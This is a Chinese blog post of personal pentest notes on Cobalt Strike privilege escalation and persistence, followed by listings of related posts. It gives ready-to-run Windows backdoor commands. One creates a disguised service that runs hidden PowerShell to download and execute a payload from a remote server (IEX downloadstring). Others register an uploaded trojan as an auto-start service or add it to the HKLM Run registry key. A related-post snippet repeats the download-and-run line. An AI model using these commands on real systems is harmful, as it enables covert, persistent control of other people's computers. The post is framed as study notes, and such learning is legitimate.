我的渗透笔记之cobaltstrike的提权以及维持权限

最新推荐文章于 2023-12-13 21:39:55 发布
最新推荐文章于 2023-12-13 21:39:55 发布
阅读量4.5k 收藏 13
点赞数 2
文章标签: 安全 windows 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/104907236
版权

一、cobaltstrike的提权:
提权:简单来说就是将用户的操作权限提升至系统权限

操作:
下面这张图的权限为用户权限
在这里插入图片描述

点击提权后,选择提供的exp,过一会就会出现系统权限的shell
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、权限的维持
权限维持:简单来说就是让我们可以更久的控制一台电脑

操作:
1、创建监听后,我们要创建一个后门,在这里我们利用脚本攻击演示一下。
在这里插入图片描述

2、设置开机后自动启动脚本后门,点击目标中执行beacon命令。

使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格,命令为如下(这里不要套用我的powershell代码,用你自己生成的)

然后成功生成一个name服务

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\"

在这里插入图片描述

设置name服务为自动:shell SC config "name" start= auto

设置服务描述:shell SC description "name" "description"

启动服务:shell net start "name”

删除服务:shell SC delete "name"

设置完后门服务后,目标主机重启后不断向攻击服务器发送数据
在这里插入图片描述

3、通过可执行文件留下维持权限的后门
首先我们先在目标主机上传一个木马,记住路径

然后对目标主机执行beacon命令:

shell sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe(填写自己木马的路径)"

sc description "server power" "description" 设置服务的描述字符串

sc config "server power" start= auto 设置这个服务为自动启动

net start "server power" 启动服务

4、通过注册表留后门
执行beacon命令

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe"(自己木马路径) /f

欢迎大家加入渗透学习交流群:1084999372
欢迎大家加入渗透学习交流群:1084999372
欢迎大家加入渗透学习交流群:1084999372

Henry404s
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
分享一个好用的CobaltStrike插件
谢公子的博客
01-17 5万+
分享一款好用的CobaltStrike插件。首先上图吧,这是一款结合了taowu、Ladon、EventLogMaster等优秀开源插件的一款插件。怎么说呢,就是汇大家之所长吧。由于本人是职业红队,所以在项目中CobaltStrike用的特别多,对市面上现有的开源插件如taowu等都用过,知道这些插件哪些地方好用,哪些地方不好用,并融合自己在项目中的经验,来编写一个混合的插件。这是最初的一个1.0版本,后续会逐渐的修改bug和增加更多更新的功能。好不好用我说了不算,大家说了才算。 这个插件目.
cobaltstrike权限维持
weixin_45682070的博客
06-13 1616
权限维持:简单来说就是让我们可以更久的控制一台电脑 生成监听后门:提权之后我们要创建一个监听后门 shell sc create "ALGS" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.17.142:80/a'))\" #生成一个ALGS服务 shell SC config "ALGS" start= au
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
Cobalt Strike的安装
热门推荐
浅笑996的博客
11-12 1万+
一.下载 压缩包下载回来之后,可以看到里面的文件有这些:   其中搭建团队服务器端的关键文件有两个,一个是cobaltstrike.jar,另一个是teamserver,这里我打算将团队服务器端搭在我的vps上。将这两个文件上传到我的vps中,注意这两个都需要,只传一个会报错,而且也不需要其他文件,其中需要对teamserver这个文件进行赋权操作。   之后启动teamserver就可以了,...
Cobaltstrike系列教程(十一)提权与横向移动
J0o1ey Blog
01-19 6376
0x001-提权 1.右键菜单提权: 选择beacon,右键,执行–>提权 我由于加载了插件,所以比官方多了几种提权方式 插件下载请看我之前的帖子 ms14-058/ms15-051/ms16-016/ms16-032 这些都是大家耳熟能详...
Cobaltstrike系列教程(十三)控制持久化
J0o1ey Blog
01-19 5354
0x000-前文 有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-右键菜单实现控制持久化 在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。 目前常见的手法有: 1.注册表 2.启动项 3.计时任务 4.设置服务 5.shift后门 6.dll劫持(白加黑) 7.利用其他安装的软件 ...
Cobalt Strike权限提升
yyj1781572的博客
11-18 1111
Cobalt Strike权限提升
CobaltStrike 上线到权限维持
Nocker888的博客
05-10 1380
CobaltStrike 上线到权限维持 Win系统上常用计划任务或注册表自启动,或者 ”白+黑” 的方法来达到权限维持的目的 自启动服务 前情提要: 权限要求:system权限 准备免杀马子,上传自定义路径 sc create "GoGo" binpath= "C:\Users\Arks7\Desktop\BypassMM\Exp.exe(路径)" sc description "GoGo" "360SB" sc config "GoGo" start= auto net start "GoGo"
Cobalt Strike渗透神器详解
读书 买花 长大
06-27 1813
cobalt strike
Cobalt Strike四种提权方法
m0_60870041的博客
12-13 1232
肥肠好用的工具 —— cs
常见windwos提权笔记
最新发布
03-30
一些常见windwos提权方式
sudo提权和普通用户免密切换到root详细笔记
07-02
sudo提权和普通用户免密切换到root详细笔记总结
Cobalt Strike 4.0笔记1
08-03
声明:本手册内容整理自Snowming04'sBLOG(blog.leanote.com/snowming),纯属转载行为,仅作为网络安全技术学习使用,请勿用于
cobalt strike笔记-常用beacon命令.pdf
04-03
cobalt strike笔记-常用beacon命令
内网安全Cobalt Strike 与 MSF 联动( 会话 相互转移 )
网络安全领域___专研者.
06-14 3519
渗透中,有时候Cobalt Strike会话可能会受限制,所以我们需要把 Cobalt Strike会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透.
三大渗透框架权限维持
09-28 1021
渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用渗透框架获得持久...
渗透后门_三大渗透测试框架权限维持技术
weixin_36115475的博客
01-09 743
0x00 前言在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?0x01 MSF权限维持使用MSF维持权限的前提是先获得一个meterpreter shell,通过meterpreter shell获取持久性shell的方法有两种:Persistence模块通过启动项...
CobaltStrike系列学习笔记——(二)提权
limb0的博客
12-07 5300
CobaltStrike系列学习笔记——(二)提权 实验环境 系统 IP地址 服务器 kali 192.168.134.130 靶机 win7 192.168.134.135 先来回顾上一节的内容 进入目录: root@kali:~# cd cobaltstrike3.14/ 启动服务器: root@kali:~/cobaltstrike3.14# ./teamserv...
【内网安全Cobalt Strike 使用
qq_44657899的博客
07-12 2189
文章目录Beacon命令argue参数污染 Beacon命令 argue参数污染 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Argue execute net1 user test test123 /add execute net1 localgroup administrators test /add argue 进程参数欺骗 argue [command] [fake arguments] argue 命令 假参数 欺骗某个命令参数 argue [com
cobaltstrike
07-27
CobaltStrike是一款常用的渗透测试工具,它需要在运行之前安装Java环境。具体来说,在Kali Linux上需要安装JDK11,在Windows 7上需要安装JDK1.8。\[1\]在Linux下,可以通过运行"./cobaltstrike"命令来启动CobaltStrike客户端。在启动客户端时,需要填写团队服务器的IP地址、端口号、用户名和密码。请注意,登录的用户名可以任意输入,但要确保该用户名没有被用于登录CobaltStrike服务器。\[2\]在确认信息填写无误后,点击"Connect"按钮连接到服务器。在连接过程中,会出现指纹校验对话框,用于防止篡改,每次创建CobaltStrike团队服务器时生成的指纹都是不同的。连接成功后,可以打开CobaltStrike的主页面,主页面包括菜单栏、快捷功能区、目标列表区、控制台命令输出区和控制台命令输入区。\[3\] #### 引用[.reference_title] - *1* [内网渗透工具CobaltStrike使用教程详解](https://blog.csdn.net/weixin_43847838/article/details/125069147)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Cobalt Strike(学习笔记)](https://blog.csdn.net/weixin_44947444/article/details/117669857)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值